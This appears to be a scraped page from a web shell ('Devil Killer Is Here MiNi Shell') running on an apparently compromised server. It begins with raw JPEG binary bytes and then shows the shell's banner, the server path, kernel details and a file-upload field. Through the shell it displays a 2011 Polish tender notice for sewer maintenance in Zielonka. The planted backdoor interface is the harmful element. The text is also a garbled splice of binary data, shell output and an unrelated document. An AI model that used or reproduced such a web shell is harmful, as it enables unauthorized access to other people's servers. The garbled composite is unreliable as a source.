JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110408/70998-N-2011.html

<p class="kh_header"><b>Zielonka: Konserwacja, oczyszczanie i usuwanie awarii urządzeń kanalizacyjnych w Zielonce</b><br>
<b>Numer ogłoszenia: 70998 - 2011; data zamieszczenia: 08.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Wodociągów i Kanalizacji w Zielonce Sp. z o. o. , ul. Literacka 20, 05-220 Zielonka, woj. mazowieckie, tel. 0-22 781 83 33, faks 0-22 781 83 32.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pwikzielonka.bip.eur.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja, oczyszczanie i usuwanie awarii urządzeń kanalizacyjnych w Zielonce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	systematyczne - przynajmniej jeden raz w miesiącu, w ciągu 2 dni od dnia zgłoszenia przez zamawiającego  - oczyszczanie  pompowni  centralnych przy ul. Leśnej, ul. Inżynierskiej, ul. Długiej  i ul. Powstańców ( oczyszczanie powinno polegać na usunięciu nagromadzonych w komorze pompowni ścieków, odłączenie zasilania pomp, wyciągnięcie pomp i oczyszczenie pomp, oczyszczenie regulatorów poziomów pracy pomp, sprawdzenie wlotów do pompowni na obecność obcych ciał mogących blokować dopływ, ponowne umieszczenie pomp w komorze pompowni, załączenie zasilania pomp ), 

2.	systematyczne - przynajmniej jeden raz na 1,5 miesiąca, w ciągu 2 dni od dnia zgłoszenia przez zamawiającego - oczyszczanie z wywozem osadów, pozostałych pompowni zamawiającego, niewymienionych w pk-cie 1., ( oczyszczanie powinno polegać na usunięciu nagromadzonych w komorze pompowni ścieków, odłączenie zasilania pomp, wyciągnięcie pomp i oczyszczenie pomp, oczyszczenie regulatorów poziomów pracy pomp, sprawdzenie wlotów do pompowni na obecność obcych ciał mogących blokować dopływ, ponowne umieszczenie pomp w komorze pompowni, załączenie zasilania pomp ), 

3.	kontrola prawidłowości funkcjonowania pompowni ścieków sanitarnych przy ul. Leśnej, Inżynierskiej, Powstańców, Długiej 3,5,7, Baśniowej i Mazowieckiej  w soboty i niedziele oraz w dni świąteczne. Kontrola pracy pompowni powinna być prowadzona w każdym z wymienionych dni  pomiędzy godz. 8.00 , a 12.00 . Kontrola powinna zostać udokumentowana wpisem pracownika wykonawcy do książki kontroli złożonej na obiekcie w każdym dniu dokonywania kontroli z podaniem dokładnej daty i godziny kontroli oraz wykazem wykonanych czynności. Kontrola powinna obejmować wizualne oględziny terenu pompowni, sprawdzenie prawidłowości pracy pomp, sprawdzenie stanu napełnienia komory pompowni i.t.p., a w razie zakłóceń w pracy pompowni powiadomienie Zamawiającego i w ramach możliwości przystąpienie do ich wyeliminowania.  

4.	bieżące sprawdzanie stanu zanieczyszczenia powierzchni ścieków w pompowniach i niedopuszczanie do tworzenia się kożucha zanieczyszczeń mogącego blokować lub powodować nieprawidłowe działanie regulatorów poziomu pracy pomp.  

5.	codzienna kontrola wszystkich komór zbiorczych ( KZ ) i przynajmniej jeden raz w ciągu dwóch tygodni oczyszczanie z wywozem osadów każdej z komór zbiorczych na kanalizacji sanitarnej podciśnieniowej oraz w każdym przypadku gdy oczyszczenie komory będzie niezbędne dla prawidłowego funkcjonowania systemu kanalizacyjnego. Oczyszczanie polega na usunięciu ścieków z komory, sprawdzenie pływaków, wlotu kanału grawitacyjnego, wylotu przewodu podciśnieniowego i.t.p.    

6.	systematyczna kontrola ( w trakcie oczyszczania komór zbiorczych ), oczyszczanie i w razie konieczności naprawy uszkodzonych pływaków lub wymiana pływaków w komorach zbiorczych kanalizacji podciśnieniowej.  

7.	dokonywanie pomiarów ciśnienia w studniach pomiarowych ( KPR ) na sanitarnej kanalizacji podciśnieniowej w miejscach i terminach wskazanych przez zamawiającego,  

8.	sukcesywne oczyszczanie kanałów kanalizacji sanitarnej grawitacyjnej ( w tym również kanałów deszczowych i drenażowych ), ciśnieniowej  i podciśnieniowej o różnych średnicach, na odcinkach i w terminie wskazanym przez zamawiającego w ilości  średniej miesięcznej w okresie obowiązywania umowy  -  2 000 mb. w ciągu miesiąca ( 48 000 m w okresie  obowiązywania umowy ).  
 
9.	oczyszczanie średnio miesięcznie w okresie obowiązywania umowy przynajmniej 25 studni kanalizacyjnych    ( rewizyjnych, kontrolnych lub chłonnych )  wskazanych przez zamawiającego w tym również studni usytuowanych na kanałach podlegających czyszczeniu, zgodnie z pkt   8 - 600 studni w okresie obowiązywania umowy.  

10.	wykonywanie prac towarzyszących, koniecznych do udrażnienia sieci kanalizacji grawitacyjnej, ciśnieniowej i podciśnieniowej w sytuacjach awaryjnych jak:  wymontowanie i ponowne zamontowanie zasuwy, zaworu, zaworu odcinającego, kryzy, odcinka przewodu usytuowanego w urządzeniu lub budowli ( poza odcinkami podziemnymi ) i.t.p., a także wykonywanie drobnych napraw związanych z awarią poza miejscem wystąpienia awarii ( np. na bazie sprzętu Wykonawcy ), niezbędnych do usunięcia awarii i dla przywrócenia sprawności sytemu kanalizacyjnego. 

11.	sprawdzanie drożności kanałów sanitarnych i rurociągów w miejscach i terminach wskazanych przez  Zamawiającego.    

12.	systematyczne - przynajmniej 1 raz na 6 miesięcy ( 2 x w ciągu 12 miesięcy ) oczyszczanie separatorów z substancji ropopochodnych i osadników z nagromadzonych olejów i osadów oraz oczyszczanie wylotów kanalizacji deszczowej. Czyszczenie urządzeń podczyszczających polega na usunięciu zgromadzonych związków ropopochodnych, wypompowaniu wody przy użyciu samochodu asenizacyjnego, usunięciu nagromadzonego szlamu i piasku, wyjęciu sekcji lamelowych lub wkładu koalescencyjnego i oczyszczeniu, płukaniu komór separatora i osadnika, sprawdzenie połączeń i usuniecie ewentualnych nieszczelności, ponowne uzbrojenie urządzenia i napełnienie wodą, sporządzenia wymaganych prawem dokumentów związanych z konserwacją urządzeń podczyszczających i odbiorem odpadów niebezpiecznych i niezwłoczne przekazanie ich zamawiającemu. Czyszczenie wylotów polega na odmuleniu wylotu, wykoszeniu traw, chwastów i porostów.   

13.	sukcesywne - przynajmniej 1 raz na 6 miesięcy ( 2 x w ciągu 12 miesięcy ) i zgodnie z harmonogramem zamawiającego  czyszczenie ulicznych wpustów deszczowych wraz z przykanalikami. Czyszczenie polega na oznakowaniu miejsca robót, zdjęciu kratki ściekowej wpustu ulicznego, oczyszczeniu osadnika wpustu, udrożnienie przykanalika, założenie kratki, wywozie zanieczyszczeń powstałych w trakcie prac.    

14.	wymiana uszkodzonych, wadliwych lub uzupełnianie skradzionych włazów studziennych lub kratek  deszczowych wpustów ulicznych  ( koszt włazów i kratek pokrywa zamawiający ). 

15.	wywożenie ścieków nagromadzonych w kanałach sanitarnych, studniach rewizyjnych, komorach zbiorczych, pompowniach oraz w miejscach zalewisk na powierzchni terenu spowodowanych niedrożnością deszczowych wpustów ulicznych lub innych elementów kanalizacji sanitarnej  i.t.p. w celu usunięcia awarii, umożliwienia przystąpienia do usunięcia awarii oraz usunięcia skutków awarii. 

16.	usuwanie awarii - dotyczy wszystkich przypadków wyszczególnionych w punktach od 1. do 15. z przystąpieniem do usuwania awarii w miejscu jej wystąpienia w czasie nieprzekraczającym 0,3  godz.     ( 20 min. ) od momentu uzyskania przez wykonawcę informacji o awarii bez względu na porę dnia  ( doby ).   Przez uzyskanie informacji o awarii należy rozumieć  skierowaną na podany przez zamawiającego, czynny całodobowo  numer telefonu, e-maila lub  faksu wiadomość o wystąpieniu awarii przez osoby i podmioty wskazane przez zamawiającego.

17.	Sporządzanie dokumentacji związanej z wszystkimi czynnościami określonymi  w pkt 1. do pkt 16. według schematu ustalonego  przez zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.48.00.00-5, 90.64.00.00-5, 90.47.00.00-2, 90.51.36.00-2, 50.50.00.00-0, 50.80.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Załączenie do oferty aktualnego odpisu z właściwego rejestru albo aktualne  zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  Ocena spełnienia warunku nastapi na podstawie kwalifikacji spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Załączenie do oferty wykazu wykonanych lub wykonywanych usług - w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, tj. wykonania lub wykonywania usług związanych z konserwacją, oczyszczaniem i usuwaniem awarii: 
-  kanalizacji sanitarnej grawitacyjnej przez okres, co najmniej 1 roku, 
-  kanalizacji sanitarnej ciśnieniowej przez okres, co najmniej 1 roku,
-  kanalizacji sanitarnej podciśnieniowej przez okres, co najmniej 1 roku  
         -   o łącznej wartości brutto wszystkich wyżej wymienionych usług wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, nie mniejszej niż 25 % wartości nominalnej ( brutto ) usług wynikającej z oferty wykonawcy za  cały okres obowiązywania umowy, z podaniem ich wartości, przedmiotu, dat wykonania, i odbiorców usług oraz załączeniem dokumentu potwierdzającego, że usługi zostały wykonane lub są wykonywane należycie.  W przypadku składania oferty przez wykonawców występujących wspólnie, każdy z poszczególnych wykonawców - podmiotów wstępujących wspólnie, musi załączyć do oferty własny wykaz z danymi wyszczególnionymi  powyżej. Przy ocenie spełnienia warunku  uwzględnione zostaną łącznie dane o usługach wyszczególnionych w wykazach przez poszczególnych wykonawców.  Ocena spełnienia warunku nastapi na podstawie kwalifikacji spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Załączenie do oferty wykazu narzędzi  i urządzeń technicznych   dostępnych wykonawcy w celu realizacji zamówienia wraz  z informacją o podstawie dysponowania tymi narzędziami i urządzeniami technicznymi, zawierający wymagany przez zamawiającego rodzaj narzędzi i urządzeń technicznych. Zamawiający wymaga, aby wykonawca dysponował:
- kamerą  z pomiarem spadków do inspekcji kanałów sanitarnych, 
- dwoma pojazdami o objętości komory min. 10 m3, przeznaczonymi do udrażniania, oczyszczania  i mycia pod wysokim ciśnieniem kanałów sanitarnych o różnych średnicach  oraz odsysania zanieczyszczeń i osadów ze studni rewizyjnych, urządzeń podczyszczających, komór  zbiorczych  i  pompowni o dużych  głębokościach, zaopatrzonych w zestaw głowic do czyszczenia kanałów o różnych średnicach,  
- samochodem - pogotowiem technicznym, wyposażonym w urządzenia techniczne umożliwiające w terenie wykonywanie prac towarzyszących, głównie w sytuacjach awaryjnych  tj. prac przy demontażu i montażu zasuw, zaworów, kryz, kołnierzy, odcinków przewodów usytuowanych w urządzeniach ( budowlach ) poza odcinkami podziemnymi,  
- zestawem oświetlenia pozwalającym do prowadzenia usługi w godzinach nocnych, 
- sprzętem do lokalizacji urządzeń podziemnych, 
- sprzętem b.h.p. w tym aparatem tlenowym przeznaczonym do użytkowania przy eksploatacji sieci i urządzeń sanitarnych, 
- urządzeniem do wykrywania i sygnalizacji  obecności gazów,
- urządzeniem mechanicznym  do ewakuacji poszkodowanych z kanału lub studni
Ocena spełnienia warunku nastapi na podstawie kwalifikacji spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Załączenie do oferty wykazu osób które  będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie dysponowania tymi osobami. Zamawiający wymaga, aby Wykonawca wykazał się dysponowaniem co najmniej 7 osób. W szczególności zamawiający wymaga, aby wykonawca wykazał się dysponowaniem:
- co najmniej dwoma osobami posiadającymi przeszkolenie w zakresie wykonywania niektórych czynności kierowania ruchem drogowym, zgodnie z przepisami ustawy z dnia 20 czerwca o ruchu drogowym ( teks jedn. Dz. U. z 2005 r. Nr 108, poz. 908 z późn. zm. ) z podaniem numerów świadectw,   
- co najmniej dwoma osobami posiadającymi aktualne energetyczne świadectwo kwalifikacyjne SEP ( E ) do 1 kV, uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci elektrycznych, z podaniem numerów  świadectw, 
- co najmniej dwoma osobami przeszkolonymi z zakresu stosowania aparatów tlenowych, przeznaczonych do użytkowania przy eksploatacji sieci i urządzeń kanalizacji sanitarnej, z podaniem numerów zaświadczeń.  Ocena spełnienia warunku nastapi na podstawie kwalifikacji spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Załączenie do oferty oświadczenia o posiadaniu wystarczającej wysokości środków finansowych do realizacji zamówienia.   Ocena spełnienia warunku nastapi na podstawie kwalifikacji spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Zezwolenie - dokument potwierdzający wymagane przepisami prawa uprawnienia do prowadzenia usług z zakresu transportu i gospodarowania odpadami niebezpiecznymi, wytwarzanymi w trakcie  wykonywania prac związanych z konserwacją i oczyszczaniem kanalizacji sanitarnej. 
2. W przypadku opłacenia polisy przelewem należy dołączyć wyciąg z konta bankowego lub inne potwierdzenie opłacenia polisy. 
3. Pisemne zobowiązanie podmiotów do oddania do dyspozycji wykonawcy niezbędnych zasobów na czas korzystania z nich przy realizacji zamówienia w przypadku przewidywanego korzystania z zasobów innych podmiotów przy realizacji zamówienia przez wykonawcę. 
4. Stosowne pełnomocnictwo w przypadku, gdy upoważnienie do podpisywania oferty nie wynika bezpośrednio ze złożonego w ofercie dokumentu.
5. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia. 
6. Wypełniony formularz oferty.
7. Wypełniony formularz - oświadczenie o spełnieniu warunków udziału w postepowaniu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pwikzielonka.bip.eur.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Wodociągów i Kanalizacji w Zielonce Spółka z o.o.
